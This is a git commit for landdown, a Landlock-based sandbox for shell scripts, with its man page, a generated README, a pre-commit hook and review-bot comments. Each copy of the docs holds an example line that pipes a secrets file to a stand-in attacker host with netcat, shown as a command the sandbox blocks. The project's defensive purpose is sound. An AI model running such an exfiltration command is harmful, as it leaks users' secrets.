landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
commit 37ceda979cf1a5ffef3454827f070445e9add7ff
parent fb2e799fd8cf1ddfde9648657618b3434851d9a9
Author: Marc <marc@coquand.email>
Date: Tue, 30 Jun 2026 10:44:50 +0200

*

Diffstat:
| A | .gitignore | | | 1 | + |
| A | README | | | 111 | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ |
| D | README.md | | | 110 | ------------------------------------------------------------------------------- |
| A | landdown.1 | | | 124 | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ |
| A | pre-commit.sh | | | 5 | +++++ |
5 files changed, 241 insertions(+), 110 deletions(-) diff --git a/.gitignore b/.gitignore @@ -0,0 +1 @@ +landdown diff --git a/README b/README 
@@ -0,0 +1,111 @@ +landdown(1) General Commands Manual landdown(1) + + + +NNAAMMEE + Landdown - Simple shell script sandbox + + +DDEESSCCRRIIPPTTIIOONN + Landdown is an easy-to-use utility for Linux that allows you to sandbox + shell scripts with Landlock. Just like Landlock, Landdown "aims to + protect you against the security impacts of bugs or + unexpected/malicious behavior". To use, prepend your script with the + landdown shebang and a ruleset, and then write your shell script like + you would normally. For example: + + #!/usr/bin/env landdown + ro /bin + ro /lib + #!/bin/sh + # Following works + echo "Hi" + # Following fails + cat $HOME/my-secrets | nc exploit.com 1337 + + + Landdown locks down file and network access of a script based on rules + explicitly listed in the allowlist. + + + +SSUUPPPPOORRTTEEDD RRUULLEESS + rof <file> + rwf <file> + ro <dir> + rw <dir> + bind <port> + connect <port> + + + Each rule can be used zero or more times. + + + The syntax is: + + #!/usr/bin/env landdown + <rules...> + #!<interpreter> + <script content...> + + +IINNSSTTAALLLL + go install git.sr.ht/~marcc/landdown@latest + + + Arch Linux <https://aur.archlinux.org/packages/landdown-git> + + +EEXXAAMMPPLLEESS + AAcccceessss aa ffiillee + Write the following script + + #!/usr/bin/env landdown + ro /bin + ro /lib + rwf /tmp/some-file.txt + #!/bin/sh + echo "Edit" > /tmp/some-file.txt + + + Try removing rwf /tmp/some-file.txt and the script should fail. + + + Note: the file need to exist in order for landdown to work, run touch + /tmp/some-file.txt to test. + + + NNeettwwoorrkk aacccceessss + Write the following script + + #!/usr/bin/env landdown + ro /bin + ro /lib + ro /etc/ssl + rof /etc/resolv.conf + connect 443 + #!/bin/bash + curl https://www.google.com + + + Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443 and it + should fail. Network access needs to be explicitly set. + + +CCOONNTTRRIIBBUUTTIIOONNSS + Contributions are welcome. 
Please send them to my public inbox + <~marcc/public-inbox@lists.sr.ht> + + +SSEEEE AALLSSOO + sshh(1) - section on ulimit + + + Good Practices <https://docs.kernel.org/userspace- + api/landlock.html#good-practices> + + + AAlltteerrnnaattiivveess + bbuubbbblleewwrraapp(1) ffiirreejjaaiill(1) llaannddrruunn(1) + + 2026-06-30 landdown(1) diff --git a/README.md b/README.md 
@@ -1,110 +0,0 @@ -# Landdown - Simple shell script sandbox - -Landdown is an easy-to-use utility for Linux that allows you to -sandbox shell scripts with [Landlock](https://landlock.io). Just like -Landlock, Landdown "aims to protect you against the security impacts -of bugs or unexpected/malicious behavior". To use, prepend your script -with the landdown shebang and a ruleset, and then write your shell -script like you would normally. For example: - -```sh -#!/usr/bin/env landdown -ro /bin -ro /lib -#!/bin/sh -# Following works -echo "Hi" -# Following fails -cat $HOME/my-secrets | nc exploit.com 1337 -``` - -Landdown locks down file and network access of a script based on rules -explicitly listed in the allowlist. - -The syntax is: - -``` -#!/usr/bin/env landdown -<rules...> -#!<interpreter> -<script content...> -``` - -## Supported rules - -``` -rof <file> -rwf <file> -ro <dir> -rw <dir> -bind <port> -connect <port> -``` - -Each rule can be used zero or more times. - - -## Install - -Generic install: - -``` -go install git.sr.ht/~marcc/landdown@latest -``` - -Arch Linux: [aur](https://aur.archlinux.org/packages/landdown-git) - -## Examples - -### Access a file - -```sh -#!/usr/bin/env landdown -ro /bin -ro /lib -rwf /tmp/some-file.txt -#!/bin/sh -echo "Edit" > /tmp/some-file.txt -``` - -Try removing `rwf /tmp/some-file.txt` and the script should fail. - -Note: the file need to exist in order for landdown to work, run `touch -/tmp/some-file.txt` to test. - -### Network access - -```sh -#!/usr/bin/env landdown -ro /bin -ro /lib -ro /etc/ssl -rof /etc/resolv.conf -connect 443 -#!/bin/bash -curl https://www.google.com -``` - -Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` -and it should fail. Network access needs to be explicitly set. - -## Patches & Contributions - -Contributions are welcome. 
Please send them to my [public -inbox](mailto:~marcc/public-inbox@lists.sr.ht) - -## See also - -- **sh**(1) - section on ulimit -- [Good Practices](https://docs.kernel.org/userspace-api/landlock.html#good-practices) - - -### Alternatives - -- **[bubblewrap](https://github.com/containers/bubblewrap)**(1) -- **[firejail](https://github.com/netblue30/firejail/tree/HEAD/src/firejail)**(1) -- **[landrun](https://github.com/Zouuup/landrun)**(1) - -Landdown tries to be as friction-less and simple as possible, and -specifically targets shell scripts rather than command line -invocations. diff --git a/landdown.1 b/landdown.1 
@@ -0,0 +1,124 @@ +.TH "landdown" 1 2026-06-30 + +.SH NAME + +Landdown - Simple shell script sandbox + +.SH DESCRIPTION + +.PP +Landdown is an easy-to-use utility for Linux that allows you to +sandbox shell scripts with Landlock. Just like Landlock, Landdown +"aims to protect you against the security impacts of bugs or +unexpected/malicious behavior". To use, prepend your script with the +landdown shebang and a ruleset, and then write your shell script like +you would normally. For example: + +.EX +#!/usr/bin/env landdown +ro /bin +ro /lib +#!/bin/sh +# Following works +echo "Hi" +# Following fails +cat $HOME/my-secrets | nc exploit.com 1337 +.EE + +.PP +Landdown locks down file and network access of a script based on rules +explicitly listed in the allowlist. + + +.SH SUPPORTED RULES + +.EX +rof <file> +rwf <file> +ro <dir> +rw <dir> +bind <port> +connect <port> +.EE + +.PP +Each rule can be used zero or more times. + +.PP +The syntax is: + +.EX +#!/usr/bin/env landdown +<rules...> +#!<interpreter> +<script content...> +.EE + +.SH INSTALL + +.EX +go install git.sr.ht/~marcc/landdown@latest +.EE + +.PP +Arch Linux <https://aur.archlinux.org/packages/landdown-git> + +.SH EXAMPLES + +.SS Access a file +.PP +Write the following script + +.EX +#!/usr/bin/env landdown +ro /bin +ro /lib +rwf /tmp/some-file.txt +#!/bin/sh +echo "Edit" > /tmp/some-file.txt +.EE + +.PP +Try removing rwf /tmp/some-file.txt and the script should fail. + +.PP +Note: the file need to exist in order for landdown to work, run touch +/tmp/some-file.txt to test. + +.SS Network access +.PP +Write the following script + +.EX +#!/usr/bin/env landdown +ro /bin +ro /lib +ro /etc/ssl +rof /etc/resolv.conf +connect 443 +#!/bin/bash +curl https://www.google.com +.EE + +.PP +Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443 +and it should fail. Network access needs to be explicitly set. + +.SH CONTRIBUTIONS + +Contributions are welcome. 
Please send them to my public +inbox <~marcc/public-inbox@lists.sr.ht> + +.SH SEE ALSO + +.PP +\fBsh\fR(1) - section on ulimit + +.PP +Good Practices <https://docs.kernel.org/userspace-api/landlock.html#good-practices> + +.SS Alternatives + +\fBbubblewrap\fR(1) +\fBfirejail\fR(1) +\fBlandrun\fR(1) diff --git a/pre-commit.sh b/pre-commit.sh @@ -0,0 +1,5 @@ +#!/bin/sh +# Add to your hooks +# ln -sf ../../pre-commit.sh .git/hooks/pre-commit +man -l landdown.1 > README +git add README
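Review bot: the `.gitignore` entry `landdown` is unanchored, so it ignores any file or directory with that name at any depth of the tree, not only the built binary. Writing it as `/landdown` limits the rule to the repository root.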
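Review bot: in the generated README, the Good Practices link under SEE ALSO is split across two lines at "userspace-" / "api/landlock.html#good-practices", so the URL cannot be copied as one string. The break comes from line filling in landdown.1; putting the URL inside an `.EX`/`.EE` block, as the page already does for the `go install` line, keeps it on one line in the rendered text.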
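Review bot: the deleted README.md ends with a paragraph that has no counterpart in landdown.1 or the new README ("Landdown tries to be as friction-less and simple as possible, and specifically targets shell scripts rather than command line invocations."), and the hyperlinks for Landlock and for bubblewrap, firejail and landrun are dropped as well. If the man page is now the single source, carry that paragraph into the Alternatives subsection and keep the URLs as plain text next to each name.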
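Review bot: the `.SH NAME` body in landdown.1 reads "Landdown - Simple shell script sandbox"; the conventional form is the command name as typed followed by an escaped dash, i.e. `landdown \- simple shell script sandbox`, which is what whatis and apropos indexing expects. Separately, the requirement that a path named in a rule must already exist appears only as a note under "Access a file" ("the file need to exist in order for landdown to work"). It belongs with the rule definitions under SUPPORTED RULES, together with a statement of what landdown does when the path is missing, and "need" should be "needs".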
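Review bot: in pre-commit.sh, `man -l landdown.1 > README` stores man's terminal rendering unfiltered, and the README added in this same commit shows the effect: section headings appear as doubled characters ("NNAAMMEE", "DDEESSCCRRIIPPTTIIOONN"), which is how overstrike bold reads once its backspaces are dropped. Piping the output through `col -b` gives plain text, and setting MANWIDTH pins the line width so the generated file does not depend on the committer's environment. The script also has no error handling: if `man` fails, the redirect has already truncated README and `git add README` still stages it, so add `set -e` or join the two commands with `&&`.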